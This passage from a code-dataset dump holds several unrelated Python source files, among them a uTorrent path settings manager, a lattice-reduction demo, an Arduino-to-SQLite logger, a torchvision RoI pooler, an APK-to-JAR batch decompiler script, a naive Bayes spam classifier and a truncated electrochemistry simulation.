10/14/2015. \r\n#\r\n# Saves all the paths for the entire program in settings.ini. Handles dynamic path redirection generation on first run.\r\n# Performs the settings.ini set,get,save tasks.\r\n# The only thing you should need to edit is the .ini file. \r\n# You can however edit the path to resume.dat here, but please note: Editing this file does not CHANGE an existing settings.ini file once it already exists.\r\n# This script is only to generates the default values and put them in settings.ini. You will have to edit the path to resume.dat in the settings.ini file.\r\n# \r\n# Version 0.1 - functional since 10/14/2015.\r\n\r\nfrom ConfigParser import RawConfigParser\r\nimport os.path\r\n\r\nclass Preferences():\r\n ''' Represents the application preferences. '''\r\n FILENAME = 'settings.ini'\r\n SECTION = \"MAIN\"\r\n utresumedat = \"C:\\\\Users\\\\EOFL\\\\AppData\\\\Roaming\\\\uTorrent\\\\resume.dat\"\r\n\r\n scriptsdir = os.path.dirname(os.path.realpath(__file__)) #the dir where these scripts are run from; C:\\\\??\\scripts\r\n maindir = os.path.dirname(scriptsdir) #the parent dir of \"scripts\"; C:\\\\??\r\n \r\n # filenames needs a unicode u symbol so os. commands work on paths with funny chars\r\n script1sourcedir = u\"seeding\\\\\"\r\n outpath1 = u\"1seeding_ID+Hash+Filename.txt\"\r\n\r\n credentialsfile = u\"scripts\\\\credentials.txt\"\r\n cookiesfile = u\"scripts\\\\cookies.dat\"\r\n\r\n script2destdir = u\"hash-grabs\\\\\"\r\n script3destdir = u\"hash-grabs-as-filenames\\\\\"\r\n outpath3 = u\"3propernames.txt\"\r\n outpath4 = u\"4beforepath-afterpath.txt\"\r\n\r\n def __init__(self):\r\n self.__do_configfile()\r\n \r\n # start private methods\r\n \r\n def __do_configfile(self):\r\n # initialize config parser\r\n self.configparser = RawConfigParser()\r\n\r\n # __load or (if non-existent) create config file\r\n if os.path.isfile(self.FILENAME):\r\n self.__load()\r\n else:\r\n self.__init_with_defaults() #only create if it doesnt exist.\r\n self.save()\r\n \r\n def __init_with_defaults(self):\r\n self.configparser.add_section(self.SECTION)\r\n self.set('utresumedat', self.utresumedat)\r\n self.set('scriptsdir', self.scriptsdir)\r\n self.set('maindir', self.maindir)\r\n self.set('script1sourcedir', self.script1sourcedir)\r\n self.set('outpath1', self.outpath1)\r\n self.set('credentialsfile', self.credentialsfile)\r\n self.set('cookiesfile', self.cookiesfile)\r\n self.set('script2destdir', self.script2destdir)\r\n self.set('script3destdir', self.script3destdir)\r\n self.set('outpath3', self.outpath3)\r\n self.set('outpath4', self.outpath4)\r\n\r\n def __load(self):\r\n ''' Loads or reloads the config from the .ini file '''\r\n self.configparser.read(self.FILENAME)\r\n\r\n # end private methods\r\n\r\n # start public methods\r\n\r\n def get(self, key):\r\n ''' Retrieves a property from the MAIN section '''\r\n return self.configparser.get(self.SECTION, key)\r\n\r\n def getwpath(self, key):\r\n ''' Retrieves a property from the MAIN section \r\n and pre-pend the maindir for a full pathname '''\r\n return os.path.join(self.maindir,self.configparser.get(self.SECTION, key))\r\n\r\n def set(self, key, value):\r\n ''' Stores a property to the MAIN section '''\r\n self.configparser.set(self.SECTION, key, value)\r\n\r\n def save(self):\r\n ''' Saves the config to the .ini file '''\r\n with open(self.FILENAME, 'wb') as configfile:\r\n self.configparser.write(configfile)\r\n\r\n # end public methods\r\n","sub_path":"scripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"602712480","text":"# -*- coding: utf-8 -*-\nfrom pylab import *\n#ion()\nimport numpy as np\nclose(\"all\")\nclear_all()\nimport itertools as it\n\ndef draw(a,b,ttl): \n figure()\n xq=list(it.product( range(-10,10,1), range(-10,10,1)))# x query\n L=np.array([x[0]*a+x[1]*b for x in xq])\n quiver(0,0,a[0],a[1],angles='xy',scale_units='xy',scale=1,color='b',label='base1')\n quiver(0,0,b[0],b[1],angles='xy',scale_units='xy',scale=1,color='r',label='base2')\n plot(L[:,0],L[:,1],'ok')\n grid()\n legend()\n title(ttl) \n axis('equal')\n xlim(-5,5)\n ylim(-5,5)\n\ndef L1norm(a):\n return np.sqrt(np.dot(a.T,a))\ndef vec(lst):\n return np.array(lst)[:, np.newaxis] \n\nclass Lattice2d:\n def __init__(self,a,b):\n self.setBasis(a,b,'initial create')\n def getBasis(self):\n return [self.a,self.b] \n def setBasis(self,a,b,comment):\n self.a=a\n self.b=b\n self.comment=comment\n draw(self.a,self.b,self.comment)\n def isOrdered(self):\n a,b=self.a,self.b\n if L1norm(a) <= L1norm(a-b) <= L1norm(b):\n print('Well Ordered')\n return True\n print('Not Ordered')\n return False\n def isReduced(self):\n a,b=self.a,self.b\n if L1norm(a) <= L1norm(a+b) \\\n and L1norm(a) <= L1norm(a-b)\\\n and L1norm(b) <= L1norm(a+b) \\\n and L1norm(b) <= L1norm(a-b):\n print('Reduced')\n return True\n print('Not Reduced')\n return False\n\ndef gauss2d(L):\n a,b=L.getBasis()\n if L1norm(a)>L1norm(b):\n a,b=b,a\n if L1norm(a-b)>L1norm(a+b):\n b=-b\n\n L.setBasis(a,b,'after preprocess, Reduced or Ordered')\n if L1norm(b)<=L1norm(a-b):\n L.setBasis(a,b,'already had Reduced by preprocess')\n return L\n if L1norm(a)<=L1norm(a-b): \n L.setBasis(a,b,'already had Ordered by preprocess') \n return loop(L)\n if L1norm(a)==L1norm(b):\n L.setBasis(a-b,a,'Reduced by swapping')\n return(L)\n L.setBasis(b-a,b,'Ordered by swapping')\n return loop(L)\n\ndef loop(L):\n while not L.isReduced():\n a,b=L.getBasis()\n norms=[L1norm(b-mu*a) for mu in np.arange(1,2*L1norm(b)/L1norm(a))]\n mu_min=np.argmin(norms)+1\n b=b-mu_min*a\n if L1norm(a-b) > L1norm(a+b):\n b=-b\n a,b=b,a\n L.setBasis(a,b,'in loop process')\n return L\n\n\nif __name__==\"__main__\": \n a,b=vec([2,1]),vec([0,3])\n L=Lattice2d(a,b)\n \n print('-----------------')\n L.isOrdered()\n L.isReduced()\n print('-----------------')\n\n gauss2d(L)\n ","sub_path":"kanyakukitei.py","file_name":"kanyakukitei.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149998909","text":"from typing import List\nfrom dataclasses import dataclass\n\n\nclass BlaIterator:\n\n def __init__(self, bla: 'Bla') -> None:\n self.bla = bla\n self.i = 0\n self.j = 0\n\n def __next__(self) -> int:\n\n if self.i < len(self.bla.kek):\n value = self.bla.kek[self.i]\n self.i += 1\n return value\n\n if self.j < len(self.bla.lol):\n value = self.bla.lol[self.j]\n self.j += 1\n return value\n\n raise StopIteration\n\n\n@dataclass\nclass Bla:\n kek: List[int]\n lol: List[int]\n\n def __iter__(self) -> BlaIterator:\n return BlaIterator(self)\n\n\ndef main() -> None:\n b1 = Bla(kek=[11, 22, 33, 44], lol=[55, 66, 77, 88, 99])\n\n for k in b1:\n print(k)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bare_python/s05_04_loopable_iterator.py","file_name":"s05_04_loopable_iterator.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"511385601","text":"#!/usr/bin/python\nimport sqlite3\nimport serial\nfrom datetime import datetime\nimport time\n\nport = \"/dev/ttyUSB0\"\narduino_serial = serial.Serial(port, 115200)\narduino_serial.flush()\ntime.sleep(2)\ndatabase = sqlite3.connect('server.db')\ndatabsepointer = database.cursor()\ndatabsepointer.execute(\"CREATE TABLE IF NOT EXISTS temparduino(temp REAL,humid REAL, date TEXT)\")\n\ndef readserial():\n\n while 1:\n if arduino_serial.inWaiting() > 0:\n data = arduino_serial.readline()\n # [\"b'42.80\", \"42.80\\\\r\\\\n'\"]\n # ['2016-07-15', '13:24:02.886386']\n d = str(data)\n values = d.split(\" \")\n v1 = values[0]\n v2 = values[1]\n temp_val = float(v1[2:])\n humid_val = float(v2[:5])\n date = str(datetime.now())\n time_stamp = date.split(\" \")\n current_time = time_stamp[1]\n time_val = time_stamp[0]+\" \"+current_time[:5]\n databsepointer.execute(\"INSERT INTO temparduino(temp,humid,date) VALUES (?,?,?)\", (temp_val, humid_val,time_val))\n database.commit()\n time.sleep(1800)\n\n\nif __name__ == \"__main__\":\n readserial()\n","sub_path":"arduno flask app/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"182841614","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom torchvision.ops import roi_align\n\nfrom torchvision.ops.boxes import box_area\n\n\nclass LevelMapper(object):\n \"\"\"Determine which FPN level each RoI in a set of RoIs should map to based\n on the heuristic in the FPN paper.\n \"\"\"\n\n def __init__(self, k_min, k_max, canonical_scale=224, canonical_level=4, eps=1e-6):\n \"\"\"\n Arguments:\n k_min (int)\n k_max (int)\n canonical_scale (int)\n canonical_level (int)\n eps (float)\n \"\"\"\n self.k_min = k_min\n self.k_max = k_max\n self.s0 = canonical_scale\n self.lvl0 = canonical_level\n self.eps = eps\n\n def __call__(self, boxlists):\n \"\"\"\n Arguments:\n boxlists (list[BoxList])\n \"\"\"\n # Compute level ids\n s = torch.sqrt(torch.cat([box_area(boxlist) for boxlist in boxlists]))\n\n # Eqn.(1) in FPN paper\n target_lvls = torch.floor(self.lvl0 + torch.log2(s / self.s0 + self.eps))\n target_lvls = torch.clamp(target_lvls, min=self.k_min, max=self.k_max)\n return target_lvls.to(torch.int64) - self.k_min\n\n\nclass MultiScaleRoIAlign(nn.Module):\n \"\"\"\n Pooler for Detection with or without FPN.\n It currently hard-code ROIAlign in the implementation,\n but that can be made more generic later on.\n Also, the requirement of passing the scales is not strictly necessary, as they\n can be inferred from the size of the feature map / size of original image,\n which is available thanks to the BoxList.\n \"\"\"\n\n def __init__(self, featmap_names, output_size, sampling_ratio):\n \"\"\"\n Arguments:\n output_size (list[tuple[int]] or list[int]): output size for the pooled region\n scales (list[float]): scales for each Pooler\n sampling_ratio (int): sampling ratio for ROIAlign\n \"\"\"\n super(MultiScaleRoIAlign, self).__init__()\n if isinstance(output_size, int):\n output_size = (output_size, output_size)\n self.featmap_names = featmap_names\n self.sampling_ratio = sampling_ratio\n self.output_size = tuple(output_size)\n self.scales = None\n self.map_levels = None\n\n def convert_to_roi_format(self, boxes):\n concat_boxes = torch.cat(boxes, dim=0)\n device, dtype = concat_boxes.device, concat_boxes.dtype\n ids = torch.cat(\n [\n torch.full((len(b), 1), i, dtype=dtype, device=device)\n for i, b in enumerate(boxes)\n ],\n dim=0,\n )\n rois = torch.cat([ids, concat_boxes], dim=1)\n return rois\n\n def infer_scale(self, feature, original_size):\n # assumption: the scale is of the form 2 ** (-k), with k integer\n size = feature.shape[-2:]\n possible_scales = []\n for s1, s2 in zip(size, original_size):\n approx_scale = float(s1) / s2\n scale = 2 ** torch.tensor(approx_scale).log2().round().item()\n possible_scales.append(scale)\n assert possible_scales[0] == possible_scales[1]\n return possible_scales[0]\n\n def setup_scales(self, features, image_shapes):\n original_input_shape = tuple(max(s) for s in zip(*image_shapes))\n scales = [self.infer_scale(feat, original_input_shape) for feat in features]\n # get the levels in the feature map by leveraging the fact that the network always\n # downsamples by a factor of 2 at each level.\n lvl_min = -torch.log2(torch.tensor(scales[0], dtype=torch.float32)).item()\n lvl_max = -torch.log2(torch.tensor(scales[-1], dtype=torch.float32)).item()\n self.scales = scales\n self.map_levels = LevelMapper(lvl_min, lvl_max)\n\n def forward(self, x, boxes, image_shapes):\n \"\"\"\n Arguments:\n x (OrderedDict[Tensor]): feature maps for each level\n boxes (list[BoxList]): boxes to be used to perform the pooling operation.\n Returns:\n result (Tensor)\n \"\"\"\n x = [v for k, v in x.items() if k in self.featmap_names]\n num_levels = len(x)\n rois = self.convert_to_roi_format(boxes)\n if self.scales is None:\n self.setup_scales(x, image_shapes)\n\n if num_levels == 1:\n return roi_align(\n x[0], rois,\n output_size=self.output_size,\n spatial_scale=self.scales[0],\n sampling_ratio=self.sampling_ratio\n )\n\n levels = self.map_levels(boxes)\n\n num_rois = len(rois)\n num_channels = x[0].shape[1]\n\n dtype, device = x[0].dtype, x[0].device\n result = torch.zeros(\n (num_rois, num_channels,) + self.output_size,\n dtype=dtype,\n device=device,\n )\n\n for level, (per_level_feature, scale) in enumerate(zip(x, self.scales)):\n idx_in_level = torch.nonzero(levels == level).squeeze(1)\n rois_per_level = rois[idx_in_level]\n\n result[idx_in_level] = roi_align(\n per_level_feature, rois_per_level,\n output_size=self.output_size,\n spatial_scale=scale, sampling_ratio=self.sampling_ratio\n )\n\n return result\n","sub_path":"torchvision/ops/poolers.py","file_name":"poolers.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"577303985","text":"from .logger import LoggerHook\n\n\nclass TextLoggerHook(LoggerHook):\n\n def log(self, runner):\n if runner.mode == 'train':\n lr_str = ', '.join(\n ['{:.5f}'.format(lr) for lr in runner.current_lr()])\n log_info = 'Epoch [{}][{}/{}]\\tlr: {}\\t'.format(\n runner.epoch + 1, runner.num_epoch_iters + 1,\n len(runner.data_loader), lr_str)\n else:\n log_info = 'Epoch({}) [{}][{}]\\t'.format(\n runner.mode, runner.epoch, runner.num_epoch_iters + 1)\n log_info += ('Time {avg[batch_time]:.3f} (Data {avg[data_time]:.3f})\\t'\n 'Loss {avg[loss]:.4f}').format(avg=runner.meter.avg)\n if len(runner.outputs['log_vars']) > 1:\n loss_items = []\n for var in runner.outputs['log_vars']:\n if var == 'loss':\n continue\n loss_items.append('{}: {:.4f}'.format(var,\n runner.meter.avg[var]))\n log_info += ' (' + ', '.join(loss_items) + ')'\n runner.logger.info(log_info)\n if self.reset_meter:\n runner.meter.reset()\n","sub_path":"torchpack/runner/hooks/text_logger.py","file_name":"text_logger.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499549416","text":"#!/usr/bin/env python\n\n## Simple python script to process all APKs in a specified path\n## by converting to .jar and unzipping to named folders\n## 2018 - Kristina Balaam | hello@chmodxx.net\n\nimport os\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport sys\n\n# Find this user's instance of dex2jar.sh\ndef get_dex2jar():\n dex2jar = Popen([\"find\", \"/Users\", \"-name\", \"d2j-dex2jar.sh\", \"-print\", \"-quit\"], stdout=subprocess.PIPE)\n \n # Read from stdout\n return dex2jar.stdout.readline().rstrip()\n\n# Disassemble .dex to .class files zipped in JAR, and unzip to directory\n# with the same name as APKs\n# return path name of these two directories\ndef disassemble_apk(path, apk_path, dex2jar):\n # Disassemble APK with dex2jar and unzip jar file to its\n # own directory\n\n # Call Dex2Jar for the specified APK path in the\n # specified directory\n subprocess.call([\"sh\", dex2jar, \"-f\", apk_path], cwd=path)\n\n # Determine jar path to eventually unzip it\n jar_path = apk_path.replace(\".apk\", \"-dex2jar.jar\")\n \n # Unzip \n subprocess.call([\"unzip\", \"-o\", \"-q\", jar_path, \"-d\", apk_path.replace(\".apk\", \"-Unzipped\")])\n\n return apk_path.replace(\".apk\", \"-Unzipped\")\n\n# Retrieve absolute paths for all APK files at specified path\ndef retrieve_all_apks(path): \n all_apks = []\n\n # traverse directory structure of the path and store\n # full filenames to list\n for root, dirs, files in os.walk(path):\n for name in files:\n if name.endswith(\".apk\"):\n all_apks.append(os.path.join(root, name))\n \n return all_apks\n\ndef main(path):\n\n # Retrieve dex2jar file and all apks to be disassembled and compared \n dex2jar_path = get_dex2jar()\n all_apks = retrieve_all_apks(path)\n\n # Store unzipped directory paths\n unzipped_paths = []\n\n # Disassemble all apks\n for apk_path in all_apks:\n unzipped_paths.append(disassemble_apk(path, apk_path, dex2jar_path))\n \n return True\n\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1]))\n\n\n","sub_path":"scripts/reverse_apks.py","file_name":"reverse_apks.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"621260777","text":"from django.contrib import admin\nfrom .models import Document, FlatPage, Publication\n\nclass DocumentAdmin(admin.ModelAdmin):\n search_fields = [\n 'user__last_name',\n 'user__first_name',\n 'user__middle_name',\n 'user__user__username',\n 'user__user__email',\n 'name',\n 'series',\n 'number',\n ]\n list_filter = [\n 'type',\n ]\n\n\nadmin.site.register(Document, DocumentAdmin)\nadmin.site.register(FlatPage)\nadmin.site.register(Publication)","sub_path":"eios/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277549952","text":"import os\nimport re\nimport math\n\nfile_names = [] # training file names read from the give directory\nham_count = 0 # number of ham email\nspam_count = 0 # number of spam email\n\ntest_file_names = []\n\n\n# all tokens we found in both ham and spam emails. its length is NOT the total of (ham_tokens_count + spam_token_count_dict).\nall_tokens = []\nham_tokens_count = 0 # total tokens count in ham\nham_token_count_dict = {} # each token with its count in ham\nham_token_prob_dict = {} # each token with its probability in ham\nspam_tokens_count = 0 # total tokens counnt in spam\nspam_token_count_dict = {} # each token with its count in spam\nspam_token_prob_dict = {} # each token with its probability in spam\n\nham_email_prob = 0\nspam_email_prob = 0\nham_score_dic = {}\nspam_score_dic = {}\nstop_word_list = []\n\ntraining_set_directory = \"simple-train-set-for-develop/\"\ntest_set_directory = \"test/\"\ngenerated_model_file = \"model.txt\"\nstop_words_file = \"stop-words.txt\"\nbaseline_result_file = \"baseline-result.txt\"\nstop_word_model_file = \"stopword-model.txt\" # experiment 2\nstop_word_result_file = \"stopword-result.txt\" # experiment 2\nword_length_model_file = \"wordlength-model.txt\" # experiment 3\nword_length_result_file = \"wordlength-result.txt\" # experiment 3\n\n\nfilter_stop_words = lambda x: x not in stop_word_list\nfilter_word_length = lambda x: len(x) > 2 and len(x) < 9\n\n'''\nRead all file names given the directory name, we need their names to identify whether it is a ham or spam\nHere is where we save all traing files\n'''\n\n\ndef read_file_names_in_directory():\n training_set_directory\n return os.listdir(training_set_directory)\n\n# training with a single file. need to save all info to their persistences\n\n\ndef generate_stop_word_list(file_path):\n global stop_word_list\n f = open(file_path, \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n stop_word_list.append(line)\n\n\ndef training_with_one_email(file_path, tokens_count, token_count_dict, token_prob_dict):\n global all_tokens\n f = open(training_set_directory + file_path,\n \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n token_list = re.split(\"[^a-zA-Z]\", line)\n token_list = map(lambda x: x.lower(), token_list)\n token_list = list(filter(filter_stop_words, token_list))\n # token_list = list(filter(filter_word_length, token_list))\n tokens_count = len(token_list) + tokens_count\n for token in token_list:\n # if token.strip():\n # token = str(token).lower()\n # else:\n # continue\n if token in token_count_dict:\n token_count_dict[token] = token_count_dict[token] + 1\n else:\n token_count_dict[token] = 1\n if token not in all_tokens:\n all_tokens.append(token)\n\n# smooth with 0.5 - assume each token will at least show 0.5 time\n\n\ndef calculate_probabilities():\n global ham_token_count_dict, spam_token_count_dict\n vocabulary_len = len(all_tokens)\n for token in all_tokens:\n if token in ham_token_count_dict.keys():\n ham_token_prob_dict[token] = (\n ham_token_count_dict[token] + 0.5) / (ham_tokens_count + 0.5 * vocabulary_len)\n else:\n ham_token_prob_dict[token] = 0.5 / \\\n (ham_tokens_count + 0.5 * vocabulary_len)\n if token in spam_token_count_dict.keys():\n spam_token_prob_dict[token] = (\n spam_token_count_dict[token] + 0.5) / (spam_tokens_count + 0.5 * vocabulary_len)\n else:\n spam_token_prob_dict[token] = 0.5 / \\\n (spam_tokens_count + 0.5 * vocabulary_len)\n\n\ndef generate_model_file(file_name):\n global all_tokens\n f = open(file_name, \"w\")\n line_counter = 1\n for token in sorted(all_tokens):\n if token in ham_token_count_dict:\n token_count_in_ham = str(ham_token_count_dict[token])\n else:\n token_count_in_ham = str(0)\n if token in spam_token_count_dict:\n token_count_in_spam = str(spam_token_count_dict[token])\n else:\n token_count_in_spam = str(0)\n toekn_prob_in_ham = str(ham_token_prob_dict[token])\n toekn_prob_in_spam = str(spam_token_prob_dict[token])\n line = str(line_counter) + \" \" + str(token) + \" \" + token_count_in_ham + \" \" + \\\n toekn_prob_in_ham + \" \" + token_count_in_spam + \" \" + toekn_prob_in_spam + \"\\r\"\n f.write(line)\n line_counter = line_counter + 1\n f.close()\n\n\ndef read_files_in_directory(file_path):\n return os.listdir(file_path)\n\n\ndef count_test_category_prob():\n global ham_email_prob\n global spam_email_prob\n test_ham_count = 0\n test_spam_count = 0\n test_file_names = read_files_in_directory(test_set_directory)\n for file in test_file_names:\n if str(file).startswith(\"test-ham\"):\n print(\"Currently testing with file: \" + file)\n test_ham_count = test_ham_count + 1\n else:\n print(\"Currently testing with file: \" + file)\n test_spam_count = test_spam_count + 1\n ham_email_prob = test_ham_count / (test_ham_count + test_spam_count)\n spam_email_prob = test_spam_count / (test_ham_count + test_spam_count)\n\n\ndef calculate_ham_score(file_path):\n global ham_email_prob\n global ham_score_dic\n score = math.log(ham_email_prob, 10)\n f = open(test_set_directory + file_path, \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n token_list = re.split(\"[^a-zA-Z]\", line)\n token_list = list(filter(filter_stop_words, token_list))\n # token_list = list(filter(filter_word_length, token_list))\n for token in token_list:\n if token.strip():\n token = str(token).lower()\n else:\n continue\n if token in ham_token_prob_dict:\n score = score + math.log10(ham_token_prob_dict[token])\n return score\n\n\ndef calculate_spam_score(file_path):\n global spam_email_prob, spam_score_dic\n score = math.log(spam_email_prob, 10)\n f = open(test_set_directory + file_path, \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n token_list = re.split(\"[^a-zA-Z]\", line)\n token_list = list(filter(filter_stop_words, token_list))\n # token_list = list(filter(filter_word_length, token_list))\n for token in token_list:\n if token.strip():\n token = str(token).lower()\n else:\n continue\n if token in spam_token_prob_dict:\n score = score + math.log10(spam_token_prob_dict[token])\n return score\n\n\n# script starts from here\ngenerate_stop_word_list(stop_words_file)\nprint(stop_word_list)\n\nfile_names = read_file_names_in_directory()\nfor file in file_names:\n if str(file).startswith(\"train-ham\"):\n print(\"Currently Training with file: \" + file)\n ham_count = ham_count + 1\n training_with_one_email(file, ham_tokens_count,\n ham_token_count_dict, ham_token_prob_dict)\n else:\n print(\"Currently Training with file: \" + file)\n spam_count = spam_count + 1\n training_with_one_email(file, spam_tokens_count,\n spam_token_count_dict, spam_token_prob_dict)\n\n\ncalculate_probabilities()\n\n# generate_model_file(generated_model_file)\ngenerate_model_file(stop_word_model_file)\n# generate_model_file(word_length_model_file)\n\ncount_test_category_prob()\n\n\n\ndef generate_test_file(file_path):\n test_file_names = read_files_in_directory(test_set_directory)\n f = open(file_path, \"w\")\n line_counter = 1\n for file in sorted(test_file_names):\n if str(file).startswith(\"test-ham\"):\n category_name = \"ham\"\n else:\n category_name = \"spam\"\n ham_score = calculate_ham_score(file)\n spam_score = calculate_spam_score(file)\n if ham_score > spam_score:\n category_test = \"ham\"\n else:\n category_test = \"spam\"\n if category_name == category_test:\n result = \"right\"\n else:\n result = \"wrong\"\n\n line = str(line_counter) + \" \" + str(file) + \" \" + str(category_name) + \" \" + \\\n str(ham_score) + \" \" + str(spam_score) + \" \" + str(category_test) + \" \" + str(result) + \"\\r\"\n f.write(line)\n line_counter = line_counter + 1\n f.close()\n\n\n#generate_test_file(baseline_result_file)\ngenerate_test_file(stop_word_result_file)\n# generate_test_file(word_length_result_file)\n\nprint(stop_word_list)\n\n\n# test_list_fliter = [\"a\", \"was\", \"sdfsdf\",\"testtest\", \"aren't\", \"onemoregjhgjhgjhgjhghjg\", \"hh\"]\n# test_list_fliter_result = list(filter(filter_stop_words, test_list_fliter))\n# test_list_fliter_result = list(filter(filter_word_length, test_list_fliter))\n# print(test_list_fliter_result)","sub_path":"EmailClassifierTrainingModel.py","file_name":"EmailClassifierTrainingModel.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"551289882","text":"import math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\nimport os\n\nimport pints\n\nfrom numba import int32, float32, float64# import the types\nfrom numba.experimental import jitclass\n\nspec = [\n ('R', float64),\n ('temp', float64),\n ('F', float64),\n ('s', float64),\n ('GAMMA', float64),\n ('v', float64),\n ('E0', float64),\n ('T0', float64),\n ('I0', float64),\n ('epsilon_start', float64),\n ('epsilon_reverse', float64),\n ('deltaepislon', float64),\n ('mew', float64),\n ('freq', float64),\n ('omega', float64),\n ('epsilon', float64),\n ('epsilon_r', float64),\n ('row', float64),\n ('zeta', float64),\n ('epsilon0_1', float64),\n ('epsilon0_2', float64),\n ('kappa0_1', float64),\n ('kappa0_2', float64),\n ('alpha1', float64),\n ('alpha2', float64),\n ('startT', float64),\n ('revT', float64),\n ('dimlessRevT', float64),\n ('endT', float64),\n ('timeStepSize', float64),\n ('dimlessTimeStepSize', float64),\n ('theta_X', float64[:]),\n ('theta_Z', float64[:]),\n ('dtheta_X_dt', float64[:]),\n ('dtheta_Z_dt', float64[:]),\n ('i', float64[:]),\n ('theta_X_Initial', float64),\n ('theta_Z_Initial', float64),\n ('I_inital', float64),\n ('gamma0', float64),\n ('gamma1', float64),\n ('gamma2', float64),\n ('gamma3', float64),\n ('gamma4', float64),\n ('gamma5', float64),\n ('gamma6', float64),\n ('gamma7', float64)\n]\n\n@jitclass(spec)\nclass newtonRaphsonFT():\n '''\n This is a class to solve the mathematical model outlined in [1] written in base python\n using an implimentation of the Newton-Raphson methond\n\n [1] Adamson, Hope, Martin Robinson, Paul S. Bond, Basem Soboh, Kathryn Gillow, Alexandr N. Simonov, Darrell M. Elton, et al. 2017. \n ‘Analysis of HypD Disulfide Redox Chemistry via Optimization of Fourier Transformed Ac Voltammetric Data’.\n Analytical Chemistry 89 (3): 1565–73. https://doi.org/10.1021/acs.analchem.6b03589.\n '''\n\n def __init__(self, timeStepSize: float, inital_current: float = 6.620541e-07, freq: float = 8.95931721948, startPotential: float = -0.15, revPotential: float = -0.75, rateOfPotentialChange: float = -22.35e-3,\n numberOfMeasurements: int= 1000000, deltaepislon: float = 150E-3, uncomp_resis: float = 27.160770551,\n electrode_area: float = 0.03, electode_coverage: float = 6.5e-12):\n\n \n #defining constants\n self.R = 8.314 #J / mol·K the perfect gas constant\n self.temp = 25.0+273.15 # k temperature in kelvin\n self.F = 96485.3329 # A.S.mol−1 Faraday constant\n\n #parameters for non-dimensionalisation\n self.s = electrode_area # E-4 # m^2 geometric area of the electrode\n self.GAMMA = electode_coverage # *1.0e3 #mols per m the surface coverage per unit area of the electrode\n self.v = rateOfPotentialChange #Vs-1 the rate at which the potential is swept over at\n\n # parameters for dimension removal\n self.E0 = (self.R*self.temp)/self.F\n self.T0 = (self.E0/self.v)\n self.I0 = (self.F*self.s*self.GAMMA)/self.T0\n\n # electode potential variables for epsilon\n self.epsilon_start = startPotential/self.E0 \n self.epsilon_reverse = revPotential/self.E0 \n\n self.deltaepislon = deltaepislon/self.E0 # V \n self.mew = 0.0 # phase set by solver\n self.freq = freq #Hz (0.11161564832 seconds per period insure data has even number of periods)\n self.omega = 0.0 # dimensionless omega set by solver 2.0*math.pi*self.freq*self.T0\n self.epsilon = 0.0\n self.epsilon_r = 0.0\n self.row = uncomp_resis*(self.I0/self.E0)# dimensionless uncompensated resistance\n\n\n self.zeta = self.F*self.s*self.GAMMA/(self.T0*self.I0) \n\n # electro-potential of the reaction\n self.epsilon0_1 = 0.0 # set by solver -0.437459534627/self.E0\n self.epsilon0_2 = 0.0 # set by solver -0.46045114238/self.E0\n\n #electron transfer rate constants\n self.kappa0_1 = 0.0 # set by solver kappa0_1 *self.T0\n self.kappa0_2 = 0.0 # set by solver kappa0_2*self.T0\n\n #electron charge transfer coefficients\n self.alpha1 = 0.5\n self.alpha2 = 0.5\n\n\n #time interval\n \n self.startT = 0.0#specify in seconds\n self.revT = abs((revPotential - startPotential)/(rateOfPotentialChange))#specify in seconds\n self.dimlessRevT = self.revT/self.T0#\n self.endT = self.revT*2.0\n self.timeStepSize = timeStepSize # in seconds\n self.dimlessTimeStepSize = timeStepSize/self.T0\n\n self.theta_X = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.theta_Z = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.dtheta_X_dt = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.dtheta_Z_dt = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.i = np.zeros(numberOfMeasurements, dtype = np.float64)\n\n self.theta_X_Initial = 1.0\n self.theta_Z_Initial = 0.0\n self.I_inital = inital_current\n\n\n # capacitance parameters\n self.gamma0 = 0.0\n self.gamma1 = 0.0\n self.gamma2 = 0.0\n self.gamma3 = 0.0\n self.gamma4 = 0.0\n self.gamma5 = 0.0\n self.gamma6 = 0.0\n self.gamma7 = 0.0\n\n\n def find_epsilon(self,time: float, index: int):\n ''' finding epsilon and epsilon_r\n as described in ref [1]\n '''\n if abs(self.T0) == self.T0:\n if time < self.dimlessRevT:\n # epsilon before dc current reversal\n self.epsilon = self.epsilon_start + time + (self.deltaepislon)*math.sin(self.omega*time + self.mew)\n elif time >= self.dimlessRevT:\n # epsilon after dc current reversal\n self.epsilon = self.epsilon_reverse - time + self.dimlessRevT + 